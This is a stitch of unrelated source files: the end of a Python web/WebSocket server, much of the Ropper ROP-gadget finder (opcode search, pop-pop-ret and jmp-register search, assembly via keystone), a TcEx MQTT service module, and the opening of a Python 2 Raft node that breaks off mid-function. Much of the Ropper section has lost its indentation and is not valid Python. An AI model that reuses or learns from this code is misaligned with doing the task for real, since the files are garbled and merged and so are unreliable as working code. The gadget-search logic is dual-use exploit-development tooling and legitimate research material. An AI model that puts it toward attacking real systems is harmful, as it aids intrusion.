    stdout.write('[DONE]\n')

    # Verifying index.html to prevent plain file serving...
    stdout.write('- Verifying \'index.html\'...\t')
    try:
        with open('index.html', 'r') as x:
            pass
        stdout.write('[DONE]\n')
    except FileNotFoundError:
        stdout.write('[FAILED]\tSERVER MIGHT BE RUNNING WITHOUT AN INTERFACE!\n')

    stdout.write('- Running WebSocket Server...\t')
    wsoc_thread.start()
    stdout.write('[DONE]\n')

    # Running the server...
    print('[jor_online_web] Active On... ' + HOST + ':' + str(PORT))
    print('[jor_online_sockets] Active On... ' + HOST + ':' + str(SOC_PORT))
    try:
        while True:
            stdout.flush()
            server.handle_request()
    except KeyboardInterrupt:
        print("\nKILLING SERVER...")
# coding=utf-8
# Copyright 2018 Sascha Schirra
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" A ND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from ropper.common.utils import *
from ropper.common.error import *
from ropper.common.enum import Enum
from ropper.arch import x86
from multiprocessing import Process, Pool, Queue, cpu_count, current_process, JoinableQueue
from .gadget import Gadget, GadgetType
from binascii import hexlify, unhexlify
from struct import pack
import re
import struct
import sys
import capstone
# Optional keystone support
try:
import keystone
except:
pass
# Output encodings for Ropper.assemble(): raw bytes, C-style string, or hex text.
class Format(Enum):
    _enum_ = 'RAW STRING HEX'
class Ropper(object):
    def __init__(self, callback=None):
        """Create a gadget searcher.

        callback function signature:
        def callback(section, gadgets, progress)
        """
        super(Ropper, self).__init__()
        self.__callback = callback
        # lazily-created capstone disassembler, cached per arch (see __getCs)
        self.__cs = None
def __getCs(self, arch):
if not self.__cs or self.__cs.arch != arch.arch or self.__cs.mode != arch.mode:
self.__cs = capstone.Cs(arch.arch, arch.mode)
return self.__cs
def assemble(self, code, arch=x86, format=Format.HEX):
if 'keystone' not in globals():
raise RopperError('Keystone is not installed! Please install Keystone. \nLook at http://keystone-engine.org')
ks = keystone.Ks(arch.ksarch[0], arch.ksarch[1])
try:
byte_list = ks.asm(code.encode('ascii'))[0]
except BaseException as e:
raise RopperError(e)
if not byte_list:
return "invalid"
to_return = byte_list
if format == Format.STRING:
to_return = '"'
for byte in byte_list:
to_return += '\\x%02x' % byte
to_return += '"'
elif format == Format.HEX:
to_return = ''
for byte in byte_list:
to_return += '%02x' % byte
elif format == Format.RAW:
to_return = ''
for byte in byte_list:
to_return += '%s' % chr(byte)
return to_return
    def disassemble(self, opcode, arch=x86):
        """Disassemble a hex opcode string and return the instruction listing.

        Bytes that cannot be decoded are reported as '<invalid>' and skipped
        one byte (not one alignment unit) at a time.
        """
        opcode, size= self._formatOpcodeString(opcode, regex=False)
        cs = self.__getCs(arch)
        to_return = ''
        byte_count = 0
        opcode_tmp = opcode
        while byte_count < size:
            old_byte_count = byte_count
            for i in cs.disasm(opcode_tmp,0):
                to_return += '%s %s\n' % (i.mnemonic , i.op_str)
                byte_count += len(i.bytes)
            # capstone stopped early: emit a marker, skip one byte, retry
            if old_byte_count == byte_count or byte_count < len(opcode):
                byte_count += 1
                opcode_tmp = opcode[byte_count:]
                to_return += '<invalid>\n'
        return to_return
def searchJmpReg(self, binary, regs):
toReturn = []
Gadget.IMAGE_BASES[binary.checksum] = binary.imageBase
for section in binary.executableSections:
gadgets = self._searchJmpReg(section, binary, regs)
toReturn.extend(gadgets)
return toReturn
def _searchJmpReg(self, section, binary, regs):
if binary.arch.arch != capstone.CS_ARCH_X86:
raise NotSupportedError(
'Wrong architecture, \'jmp <reg>\' only supported on x86/x86_64')
cs = self.__getCs(binary.arch)
toReturn = []
Register = Enum('Register', 'ax cx dx bx sp bp si di')
for reg in regs:
reg_tmp = reg.strip()[1:]
if not Register[reg_tmp]:
raise RopperError('Invalid register: "%s"' % reg)
insts = [toBytes(0xff , 0xe0 | Register[reg_tmp]), toBytes(0xff, 0xd0 | Register[reg_tmp]), toBytes(0x50 | Register[reg_tmp] , 0xc3)]
for inst in insts:
toReturn.extend(self._searchOpcode(section, binary, inst, len(inst),True))
return sorted(toReturn, key=lambda x: str(x))
def _formatOpcodeString(self, opcode, regex=True):
if len(opcode) % 2 > 0:
raise RopperError('The length of the opcode has to be a multiple of two')
opcode = opcode.encode('ascii')
size = int(len(opcode)/2)
for b in (b'5c',b'5d',b'5b',b'28',b'29',b'2b',b'2a',b'2e',b'3f'):
if opcode.find(b) % 2 == 0:
opcode = opcode.replace(b,b'%s%s' % (hexlify(b'\\'),b))
m = re.search(b'\?', opcode)
while m:
if m.start() % 2 == 0:
char = opcode[m.start()+1]
if type(char) == int:
char = chr(char)
if char == '?':
opcode = opcode[:m.start()] + hexlify(b'[\x00-\xff]') + opcode[m.start()+2:]
else:
raise RopperError('A ? for the highest 4 bit of a byte is not supported (e.g. ?1, ?2, ..., ?a)')
elif m.start() % 2 == 1:
char = opcode[m.start()-1]
if type(char) == int:
char = chr(char)
high = int(char,16)
start = high << 4
end = start + 0xf
opcode = opcode[:m.start()-1] + hexlify(b'['+pack('B',start)+b'-'+pack('B',end)+b']') + opcode[m.start()+1:]
m = re.search(b'\?', opcode)
try:
opcode = unhexlify(opcode)
except BaseException as e:
#raise RopperError(e)
raise RopperError('Invalid characters in opcode string: %s' % opcode)
return opcode,size
def searchInstructions(self, binary, code):
Gadget.IMAGE_BASES[binary.checksum] = binary.imageBase
opcode = self.assemble(code, binary.arch)
return self.searchOpcode(binary, opcode, disass=True)
def searchOpcode(self, binary, opcode, disass=False):
Gadget.IMAGE_BASES[binary.checksum] = binary.imageBase
opcode, size = self._formatOpcodeString(opcode)
gadgets = []
for section in binary.executableSections:
gadgets.extend(self._searchOpcode(section, binary, opcode, size, disass))
return gadgets
    def _searchOpcode(self, section, binary, opcode, size, disass=False):
        """Find all alignment-respecting matches of *opcode* in one section.

        When *disass* is True the match is disassembled and dropped if capstone
        cannot decode it; otherwise the raw bytes are stored hex-encoded.
        """
        disassembler = self.__getCs(binary.arch)
        toReturn = []
        code = bytearray(section.bytes)
        offset = section.offset
        for match in re.finditer(opcode, code):
            opcodeGadget = Gadget(binary.checksum, section.name, binary.arch)
            # only keep matches on an instruction-alignment boundary
            if (offset + match.start()) % binary.arch.align == 0:
                if disass:
                    could_disass = False
                    for i in disassembler.disasm(struct.pack('B' * size, *code[match.start():match.end()]), offset + match.start()):
                        opcodeGadget.append(
                            i.address, i.mnemonic , i.op_str, bytes=i.bytes)
                        could_disass = True
                    # undecodable match: discard it entirely
                    if not could_disass:
                        continue
                else:
                    opcodeGadget.append(
                        offset + match.start(), hexlify(match.group(0)).decode('utf-8'),bytes=match.group())
            else:
                continue
            toReturn.append(opcodeGadget)
        return toReturn
def searchPopPopRet(self, binary):
Gadget.IMAGE_BASES[binary.checksum] = binary.imageBase
toReturn = []
for section in binary.executableSections:
pprs = self._searchPopPopRet(section,binary)
toReturn.extend(pprs)
return toReturn
    def _searchPopPopRet(self, section, binary):
        """Find pop; pop; ret sequences in one section (x86 only).

        Raises:
            NotSupportedError: for non-x86 architectures.
        """
        if binary.arch != x86:
            raise NotSupportedError(
                'Wrong architecture, \'pop pop ret\' is only supported on x86')
        disassembler = self.__getCs(binary.arch)
        code = section.bytes
        offset = section.offset
        toReturn = []
        # per-arch regex byte patterns for the pop/pop/ret encodings
        pprs = binary.arch.pprs
        for ppr in pprs:
            for match in re.finditer(ppr, code):
                # only alignment-respecting matches are usable gadgets
                if (offset + match.start()) % binary.arch.align == 0:
                    pprg = Gadget(binary.checksum,section.name, binary.arch)
                    for i in disassembler.disasm(bytes(bytearray(code)[match.start():match.end()]), offset + match.start()):
                        pprg.append(i.address, i.mnemonic , i.op_str, bytes=i.bytes)
                    toReturn.append(pprg)
        return toReturn
def searchGadgets(self, binary, instructionCount=5, gtype=GadgetType.ALL):
Gadget.IMAGE_BASES[binary.checksum] = binary.imageBase
gadgets = []
for section in binary.executableSections:
vaddr = binary.imageBase
if self.__callback:
self.__callback(section, None, 0)
if sys.platform.startswith('win'):
newGadgets = self._searchGadgetsSingle(section=section, binary=binary, instruction_count=instructionCount, gtype=gtype)
else:
newGadgets = self._searchGadgetsForked(section=section, binary=binary, instruction_count=instructionCount, gtype=gtype)
gadgets.extend(newGadgets)
return sorted(gadgets, key=Gadget.simpleInstructionString)
    def _searchGadgetsSingle(self, section, binary, instruction_count=5, gtype=GadgetType.ALL):
        """Single-process gadget search over one section (Windows fallback).

        For each configured ending pattern, walks backward from every aligned
        match and keeps each decodable gadget of at most *instruction_count*
        instructions, de-duplicated by start address.
        """
        toReturn = []
        code = bytes(bytearray(section.bytes))
        offset = section.offset
        arch = binary.arch
        max_progress = len(code) * len(arch.endings[gtype])
        vaddrs = set()   # gadget start addresses already emitted
        for ending in arch.endings[gtype]:
            offset_tmp = 0
            tmp_code = code[:]
            match = re.search(ending[0], tmp_code)
            while match:
                offset_tmp += match.start()
                index = match.start()
                if offset_tmp % arch.align == 0:
                    #for x in range(arch.align, (depth + 1) * arch.align, arch.align): # This can be used if you want to use a bytecount instead of an instruction count per gadget
                    none_count = 0
                    # extend the gadget backward one alignment unit at a time
                    for x in range(0, index+1, arch.align):
                        code_part = tmp_code[index - x:index + ending[1]]
                        gadget, leng = self.__createGadget(arch, code_part, offset + offset_tmp - x, ending,binary.checksum, section.name)
                        if gadget:
                            if leng > instruction_count:
                                break
                        if gadget:
                            if gadget.address not in vaddrs:
                                vaddrs.update([gadget.address])
                                toReturn.append(gadget)
                            none_count = 0
                        else:
                            none_count += 1
                            # too many undecodable extensions in a row: give up
                            if none_count == arch.maxInvalid:
                                break
                tmp_code = tmp_code[index+arch.align:]
                offset_tmp += arch.align
                match = re.search(ending[0], tmp_code)
                if self.__callback:
                    progress = arch.endings[gtype].index(ending) * len(code) + len(code) - len(tmp_code)
                    self.__callback(section, toReturn, float(progress) / max_progress)
        if self.__callback:
            self.__callback(section, toReturn, 1.0)
        return toReturn
def _searchGadgetsForked(self, section, binary, instruction_count=5, gtype=GadgetType.ALL):
to_return = []
code = bytes(bytearray(section.bytes))
processes = []
arch = binary.arch
max_progress = len(code) * len(arch.endings[gtype])
ending_queue = JoinableQueue()
gadget_queue = Queue()
tmp_code = code[:]
process_count = min(cpu_count()+1, len(arch.endings[gtype]))
for ending in arch.endings[gtype]:
ending_queue.put(ending)
for cpu in range(process_count):
ending_queue.put(None)
for cpu in range(process_count):
processes.append(Process(target=self.__gatherGadgetsByEndings, args=(tmp_code, arch, binary.checksum, section.name, section.offset, ending_queue, gadget_queue, instruction_count), name="GadgetSearch%d"%cpu))
processes[cpu].daemon=True
processes[cpu].start()
count = 0
ending_count = 0
if self.__callback:
self.__callback(section, to_return, 0)
while ending_count < len(arch.endings[gtype]):
gadgets = gadget_queue.get()
if gadgets != None:
to_return.extend(gadgets)
ending_count += 1
if self.__callback:
self.__callback(section, to_return, float(ending_count) / len(arch.endings[gtype]))
return to_return
    def __gatherGadgetsByEndings(self,code, arch, fileName, sectionName, offset, ending_queue, gadget_queue, instruction_count):
        """Worker-process loop: pull endings off the queue until the None
        sentinel arrives, posting one gadget list per ending on gadget_queue."""
        #try:
        while True:
            ending = ending_queue.get()
            if ending is None:
                ending_queue.task_done()
                break
            gadgets = self.__gatherGadgetsByEnding(code, arch, fileName, sectionName, offset, ending, instruction_count)
            gadget_queue.put(gadgets)
            ending_queue.task_done()
        #except BaseException as e:
        #    raise RopperError(e)
    def __gatherGadgetsByEnding(self, code, arch, fileName, sectionName, offset, ending, instruction_count):
        """Collect all gadgets for a single ending pattern (worker-side helper;
        same backward-walk algorithm as _searchGadgetsSingle, minus progress
        reporting)."""
        vaddrs = set()   # NOTE(review): unused in this variant -- confirm
        offset_tmp = 0
        tmp_code = code[:]
        to_return = []
        match = re.search(ending[0], tmp_code)
        while match:
            offset_tmp += match.start()
            index = match.start()
            if offset_tmp % arch.align == 0:
                #for x in range(arch.align, (depth + 1) * arch.align, arch.align): # This can be used if you want to use a bytecount instead of an instruction count per gadget
                none_count = 0
                # extend the gadget backward one alignment unit at a time
                for x in range(0, index+1, arch.align):
                    code_part = tmp_code[index - x:index + ending[1]]
                    gadget, leng = self.__createGadget(arch, code_part, offset + offset_tmp - x , ending, fileName, sectionName)
                    if gadget:
                        if leng > instruction_count:
                            break
                    if gadget:
                        to_return.append(gadget)
                        none_count = 0
                    else:
                        none_count += 1
                        if none_count == arch.maxInvalid:
                            break
            tmp_code = tmp_code[index+arch.align:]
            offset_tmp += arch.align
            match = re.search(ending[0], tmp_code)
        return to_return
    def __createGadget(self, arch, code_str, codeStartAddress, ending, binary=None, section=None):
        """Disassemble *code_str* and return (gadget, length) when it forms a
        valid gadget terminated by *ending*, else (None, -1)."""
        gadget = Gadget(binary, section, arch)
        hasret = False
        disassembler = self.__getCs(arch)
        for i in disassembler.disasm(code_str, codeStartAddress):
            if re.match(ending[0], i.bytes):
                hasret = True
            if hasret or i.mnemonic not in arch.badInstructions:
                gadget.append(
                    i.address, i.mnemonic,i.op_str, bytes=i.bytes)
            # stop after the ending instruction or on a disallowed instruction
            if hasret or i.mnemonic in arch.badInstructions:
                break
        leng = len(gadget)
        if hasret and leng > 0:
            return gadget,leng
        return None, -1
    def __disassembleBackward(self, section, binary, vaddr,offset, count):
        """Disassemble *count* instructions that end exactly at *vaddr*, moving
        the start address back one alignment unit at a time until the decoded
        stream lands on vaddr."""
        gadget = Gadget(binary.checksum, section.name, binary.arch)
        counter = 0
        toReturn = None
        code = bytes(bytearray(section.bytes))
        disassembler = self.__getCs(binary.arch)
        while len(gadget) < count:
            gadget = Gadget(binary.checksum, section.name, binary.arch)
            for i in disassembler.disasm(struct.pack('B' * len(code[offset - counter:]), *bytearray(code[offset - counter:])), vaddr-counter):
                # NOTE(review): bytes passed positionally here but by keyword
                # elsewhere -- confirm Gadget.append's signature
                gadget.append(i.address, i.mnemonic , i.op_str, i.bytes)
                if i.address == vaddr:
                    toReturn = gadget
                    break
                # overshot the target address: this start point was misaligned
                if i.address > vaddr:
                    if len(gadget) > count:
                        return toReturn
                    gadget = Gadget(binary.checksum, section.name, binary.arch)
                    break
            counter += binary.arch.align
            if offset - counter < 0:
                return toReturn
        if not toReturn:
            toReturn = Gadget(binary.checksum, section.name, binary.arch)
            toReturn.append(vaddr,'bad instructions')
        return toReturn
    def disassembleAddress(self, section, binary, vaddr, offset, count):
        """Disassemble *count* instructions at vaddr/offset; a negative count
        disassembles backward so the listing ends at the address.

        Raises:
            RopperError: when vaddr is not aligned for the binary's arch.
        """
        if vaddr % binary.arch.align != 0:
            raise RopperError('The address doesn\'t have the correct alignment')
        Gadget.IMAGE_BASES[binary.checksum] = binary.imageBase
        code = bytes(bytearray(section.bytes))
        # NOTE(review): builds a fresh Cs instead of using self.__getCs's cache
        # -- confirm intentional
        disassembler = capstone.Cs(binary.arch.arch, binary.arch.mode)
        if count < 0:
            return self.__disassembleBackward(section, binary, vaddr, offset, count*-1)
        gadget = Gadget(binary.checksum, section.name, binary.arch)
        c = 0
        for i in disassembler.disasm(struct.pack('B' * len(code[offset:]), *bytearray(code[offset:])), offset):
            gadget.append(i.address, i.mnemonic , i.op_str,bytes=i.bytes)
            c += 1
            if c == count:
                break
        if not len(gadget):
            gadget.append(vaddr,'bad instructions')
        return gadget
def toBytes(*b):
    """Pack the given integer byte values (0-255) into a bytes object."""
    buf = bytearray()
    for value in b:
        buf.append(value)
    return bytes(buf)
"""TcEx Framework Service Common module"""
# standard library
import json
import logging
import threading
import time
import traceback
import uuid
from datetime import datetime
from typing import Callable, Optional, Union
# first-party
from tcex.services.mqtt_message_broker import MqttMessageBroker
# get tcex logger
logger = logging.getLogger('tcex')
class CommonService:
    """TcEx Framework Service Common module.

    Shared service logic between the supported service types:

    * API Service
    * Custom Trigger Service
    * Webhook Trigger Service
    """

    def __init__(self, tcex: object):
        """Initialize the Class properties.

        Args:
            tcex: Instance of TcEx.
        """
        self.tcex = tcex

        # properties
        # Fix: initialize the metrics store so heartbeat/metric methods can run
        # before a subclass or the `metrics` setter populates it (previously
        # `self._metrics` was never assigned here and the first heartbeat could
        # raise AttributeError).
        self._metrics = {}
        self._ready = False
        self._start_time = datetime.now()
        self.args: object = tcex.inputs.model
        self.configs = {}
        self.heartbeat_max_misses = 3
        self.heartbeat_sleep_time = 1  # seconds between watchdog ticks
        self.heartbeat_watchdog = 0
        self.ij = tcex.ij
        self.key_value_store = self.tcex.key_value_store
        self.log = logger
        self.logger = tcex.logger
        self.message_broker = MqttMessageBroker(
            broker_host=self.args.tc_svc_broker_host,
            broker_port=self.args.tc_svc_broker_port,
            broker_timeout=self.args.tc_svc_broker_conn_timeout,
            broker_token=self.args.tc_svc_broker_token,
            broker_cacert=self.args.tc_svc_broker_cacert_file,
        )
        self.ready = False
        self.redis_client = self.tcex.redis_client
        self.token = tcex.token

        # config callbacks
        self.shutdown_callback = None

    def _create_logging_handler(self):
        """Create a logging handler for the current session thread, if missing."""
        if self.logger.handler_exist(self.thread_name):
            return

        # create trigger id logging filehandler
        self.logger.add_pattern_file_handler(
            name=self.thread_name,
            filename=f'''{datetime.today().strftime('%Y%m%d')}/{self.session_id}.log''',
            level=self.args.tc_log_level,
            path=self.args.tc_log_path,
            # uuid4 pattern for session_id
            pattern=r'^[0-9a-f]{8}-[0-9a-f]{4}-4[0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}.log$',
            handler_key=self.session_id,
            thread_key='session_id',
        )

    def process_acknowledged_command(
        self, message: dict
    ) -> None:  # pylint: disable=unused-argument
        """Process the Acknowledge command.

        Args:
            message: The message payload from the server topic.
        """
        self.log.info(f'feature=service, event=acknowledge, message={message}')

    def add_metric(self, label: str, value: Union[int, str]) -> None:
        """Add a metric.

        Metrics are reported in heartbeat message.

        Args:
            label: The metric label (e.g., hits) to add.
            value: The value for the metric.
        """
        self._metrics[label] = value

    @property
    def command_map(self) -> dict:
        """Return the command map for the current Service type."""
        return {
            'acknowledged': self.process_acknowledged_command,
            'brokercheck': self.process_broker_check,
            'heartbeat': self.process_heartbeat_command,
            'loggingchange': self.process_logging_change_command,
            'shutdown': self.process_shutdown_command,
        }

    @staticmethod
    def create_session_id() -> str:  # pylint: disable=unused-argument
        """Return a uuid4 session id.

        Returns:
            str: A unique UUID string value.
        """
        return str(uuid.uuid4())

    def heartbeat(self) -> None:
        """Start heartbeat process in a daemon thread."""
        self.service_thread(name='heartbeat', target=self.heartbeat_monitor)

    def heartbeat_broker_check(self) -> None:
        """Send self check message to ensure communications with message broker."""
        message = {
            'command': 'BrokerCheck',
            'date': str(datetime.now()),
            'heartbeat_watchdog': self.heartbeat_watchdog,
        }
        self.message_broker.publish(
            message=json.dumps(message), topic=self.args.tc_svc_server_topic
        )

        # allow time for message to be received
        time.sleep(5)

    def heartbeat_monitor(self) -> None:
        """Publish heartbeat on timer.

        Shuts the service down if the server stops sending Heartbeat commands
        (the watchdog is reset by process_heartbeat_command).
        """
        self.log.info('feature=service, event=heartbeat-monitor-started')
        while True:
            # check heartbeat is not missed
            if self.heartbeat_watchdog > (
                int(self.args.tc_svc_hb_timeout_seconds) / int(self.heartbeat_sleep_time)
            ):
                # send self check message
                self.heartbeat_broker_check()

                self.log.error(
                    'feature=service, event=missed-heartbeat, action=shutting-service-down'
                )
                self.process_shutdown_command({'reason': 'Missed heartbeat commands.'})
                break
            time.sleep(self.heartbeat_sleep_time)
            self.heartbeat_watchdog += 1

    def increment_metric(self, label: str, value: Optional[int] = 1) -> None:
        """Increment a metric if already exists.

        Args:
            label: The metric label (e.g., hits) to increment.
            value: The increment value. Defaults to 1.
        """
        if self._metrics.get(label) is not None:
            self._metrics[label] += value

    def listen(self) -> None:
        """Listen for messages coming from the broker."""
        self.message_broker.add_on_connect_callback(self.on_connect_handler)
        self.message_broker.add_on_message_callback(
            self.on_message_handler, topics=[self.args.tc_svc_server_topic]
        )
        self.message_broker.register_callbacks()

        # start listener thread
        self.service_thread(name='broker-listener', target=self.message_broker.connect)

    def loop_forever(self, sleep: Optional[int] = 1) -> bool:
        """Block and wait for shutdown.

        Args:
            sleep: The amount of time to sleep between iterations. Defaults to 1.

        Returns:
            bool: Returns True until shutdown received.
        """
        while True:
            deadline = time.time() + sleep
            while time.time() < deadline:
                if self.message_broker.shutdown:
                    return False
                time.sleep(1)
            return True

    @property
    def metrics(self) -> dict:
        """Return current metrics."""
        # TODO: move to trigger command and handle API Service
        if self._metrics.get('Active Playbooks') is not None:
            self.update_metric('Active Playbooks', len(self.configs))
        return self._metrics

    @metrics.setter
    def metrics(self, metrics: dict):
        """Replace the current metrics dict (must be a dict)."""
        if isinstance(metrics, dict):
            self._metrics = metrics
        else:
            self.log.error('feature=service, event=invalid-metrics')

    def on_connect_handler(
        self, client, userdata, flags, rc  # pylint: disable=unused-argument
    ) -> None:
        """On connect method for mqtt broker."""
        self.log.info(
            f'feature=service, event=topic-subscription, topic={self.args.tc_svc_server_topic}'
        )
        self.message_broker.client.subscribe(self.args.tc_svc_server_topic)
        self.message_broker.client.disable_logger()

    def on_message_handler(
        self, client, userdata, message  # pylint: disable=unused-argument
    ) -> None:
        """On message for mqtt.

        Dispatches each JSON message to the handler named in its "command"
        field via command_map, on a new session thread.
        """
        try:
            # messages on server topic must be json objects
            m = json.loads(message.payload)
        except ValueError:
            self.log.warning(
                f'feature=service, event=parsing-issue, message="""{message.payload}"""'
            )
            return

        # use the command to call the appropriate method defined in command_map
        command: str = m.get('command', 'invalid').lower()
        trigger_id: Optional[int] = m.get('triggerId')
        if trigger_id is not None:
            # coerce trigger_id to int in case a string was provided (testing framework)
            trigger_id = int(trigger_id)
        self.log.info(f'feature=service, event=command-received, command="{command}"')

        # create unique session id to be used as thread name
        # and stored as property of thread for logging emit
        session_id = self.create_session_id()

        # get the target method from command_map for the current command
        thread_method = self.command_map.get(command, self.process_invalid_command)
        self.service_thread(
            # use session_id as thread name to provide easy debugging per thread
            name=session_id,
            target=thread_method,
            args=(m,),
            session_id=session_id,
            trigger_id=trigger_id,
        )

    def process_broker_check(self, message: dict) -> None:
        """Implement parent method to log a broker check message.

        .. code-block:: python
            :linenos:
            :lineno-start: 1

            {
                "command": "BrokerCheck",
            }

        Args:
            message: The message payload from the server topic.
        """
        self.log.warning(f'feature=service, event=broker-check, message={message}')

    def process_heartbeat_command(self, message: dict) -> None:  # pylint: disable=unused-argument
        """Process the HeartBeat command.

        .. code-block:: python
            :linenos:
            :lineno-start: 1

            {
                "command": "Heartbeat",
                "metric": {},
                "memoryPercent": 0,
                "cpuPercent": 0
            }

        Args:
            message: The message payload from the server topic.
        """
        # reset the watchdog; heartbeat_monitor shuts down when it grows too large
        self.heartbeat_watchdog = 0

        # send heartbeat -acknowledge- command
        response = {'command': 'Heartbeat', 'metric': self.metrics}
        self.message_broker.publish(
            message=json.dumps(response), topic=self.args.tc_svc_client_topic
        )
        self.log.info(f'feature=service, event=heartbeat-sent, metrics={self.metrics}')

    def process_logging_change_command(self, message: dict) -> None:
        """Process the LoggingChange command.

        .. code-block:: python
            :linenos:
            :lineno-start: 1

            {
                "command": "LoggingChange",
                "level": "DEBUG"
            }

        Args:
            message: The message payload from the server topic.
        """
        level: str = message.get('level')
        self.log.info(f'feature=service, event=logging-change, level={level}')
        self.logger.update_handler_level(level)

    def process_invalid_command(self, message: dict) -> None:
        """Process all invalid commands.

        Args:
            message: The message payload from the server topic.
        """
        self.log.warning(
            f'feature=service, event=invalid-command-received, message="""({message})""".'
        )

    def process_shutdown_command(self, message: dict) -> None:
        """Implement parent method to process the shutdown command.

        .. code-block:: python
            :linenos:
            :lineno-start: 1

            {
                "command": "Shutdown",
                "reason": "Service disabled by user."
            }

        Args:
            message: The message payload from the server topic.
        """
        reason = message.get('reason') or (
            'A shutdown command was received on server topic. Service is shutting down.'
        )
        self.log.info(f'feature=service, event=shutdown, reason={reason}')

        # acknowledge shutdown command
        self.message_broker.publish(
            json.dumps({'command': 'Acknowledged', 'type': 'Shutdown'}),
            self.args.tc_svc_client_topic,
        )

        # call App shutdown callback
        if callable(self.shutdown_callback):
            try:
                # call callback for shutdown and handle exceptions to protect thread
                self.shutdown_callback()  # pylint: disable=not-callable
            except Exception as e:
                self.log.error(
                    f'feature=service, event=shutdown-callback-error, error="""({e})""".'
                )
                self.log.trace(traceback.format_exc())

        # unsubscribe and disconnect from the broker
        self.message_broker.client.unsubscribe(self.args.tc_svc_server_topic)
        self.message_broker.client.disconnect()

        # update shutdown flag
        self.message_broker.shutdown = True

        # TODO: [review] this doesn't help if MainThread does not die.
        # # delay shutdown to give App time to cleanup
        # time.sleep(5)
        # self.tcex.exit(ExitCode.SUCCESS)  # final shutdown in case App did not

    @property
    def ready(self) -> bool:
        """Return ready boolean."""
        return self._ready

    @ready.setter
    def ready(self, bool_val: bool):
        """Set ready boolean; publishes the Ready command on first True."""
        if isinstance(bool_val, bool) and bool_val is True:
            # wait until connected to send ready command
            while not self.message_broker._connected:
                if self.message_broker.shutdown:
                    break
                time.sleep(1)
            else:  # pylint: disable=useless-else-on-loop
                # loop finished without break -> broker is connected
                self.log.info('feature=service, event=service-ready')
                ready_command = {'command': 'Ready'}
                if self.ij.model.runtime_level.lower() in ['apiservice']:
                    ready_command['discoveryTypes'] = self.ij.model.service.discovery_types
                self.message_broker.publish(
                    json.dumps(ready_command), self.args.tc_svc_client_topic
                )
                self._ready = True

    def service_thread(
        self,
        name: str,
        target: Callable[[], bool],
        args: Optional[tuple] = None,
        kwargs: Optional[dict] = None,
        session_id: Optional[str] = None,
        trigger_id: Optional[int] = None,
    ) -> None:
        """Start a message thread.

        Args:
            name: The name of the thread.
            target: The method to call for the thread.
            args: The args to pass to the target method.
            kwargs: Additional args.
            session_id: The current session id.
            trigger_id: The current trigger id.
        """
        self.log.info(f'feature=service, event=service-thread-creation, name={name}')
        args = args or ()
        try:
            t = threading.Thread(name=name, target=target, args=args, kwargs=kwargs, daemon=True)
            # add session_id to thread to use in logger emit
            t.session_id = session_id
            # add trigger_id to thread to use in logger emit
            t.trigger_id = trigger_id
            t.start()
        except Exception:
            # protect the caller; failures are only traced
            self.log.trace(traceback.format_exc())

    @property
    def session_id(self) -> Optional[str]:
        """Return the current session_id, creating and caching one per thread."""
        if not hasattr(threading.current_thread(), 'session_id'):
            threading.current_thread().session_id = self.create_session_id()
        return threading.current_thread().session_id

    @property
    def thread_name(self) -> str:
        """Return the current thread's name."""
        return threading.current_thread().name

    @property
    def trigger_id(self) -> Optional[int]:
        """Return the current trigger_id stored on the thread, if any."""
        trigger_id = None
        if hasattr(threading.current_thread(), 'trigger_id'):
            trigger_id = threading.current_thread().trigger_id
            if trigger_id is not None:
                trigger_id = int(trigger_id)
        return trigger_id

    def update_metric(self, label: str, value: Union[int, str]) -> None:
        """Update a metric if already exists.

        Args:
            label: The metric label (e.g., hits) to update.
            value: The updated value for the metric.
        """
        if self._metrics.get(label) is not None:
            self._metrics[label] = value
|
raft.py | import threading
import time
import random
import json
import math
import sys
import os
from Queue import Queue,Empty
#ELECTION_TIMEOUT_LIMITS = (150, 300)
HEARTHBEAT_INTERVAL = 150
ELECTION_PERIOD = 1000 # 1s for a candidate to wait for others response
class RaftNode(object):
    # A single toy Raft-style node (Python 2 code).
    # State transitions: follower => wait_for_candidate => candidate => leader,
    # or follower => did-vote when the node votes for another candidate.
    def __init__(self, i):
        # i: unique node id within the cluster.
        self.i = i
        self.raft_state = self.state = 'follower'
        self.term = 0
        self.HEARTHBEAT_TIMEOUT = 1000  # ms without a leader ping before refuting it
        self.ELECTION_TIMEOUT_LIMITS = (150, 300)  # ms range for the random election timeout
        self.leader = None
        # inner state that varies between:
        # follower => wait_for_candidate => candidate => leader
        # => did_vote
        self.set_state('follower')
        # time.time() after which this node may become a candidate
        self.t_to_candidate = 0
        # the number of votes we have received this election
        self.nb_vote = 0
        # the election turn we are in. This increases the election_timeout
        # each time we go back into candidate state.
        self.election_turn = 0
        self.interrrupted = False
        self.last_leader_talk = 0

    def stop(self):
        # Leave the cluster and make main()/node_loop() exit.
        self.set_state('leaved')
        self.interrrupted = True

    def __str__(self):
        return '(%d:%s)' % (self.i, self.state)

    def tick(self, nodes):
        # Placeholder; all work happens in node_loop().
        pass

    def set_state(self, state):
        # Central state switch so every transition is logged.
        print self.i, "SWITCHING from ", self.state, "TO ", state
        self.state = state

    # Send a message to all other nodes, but not me
    def send_to_others(self, nodes, m):
        for d in nodes:
            other = d['node']
            if other.i != self.i:
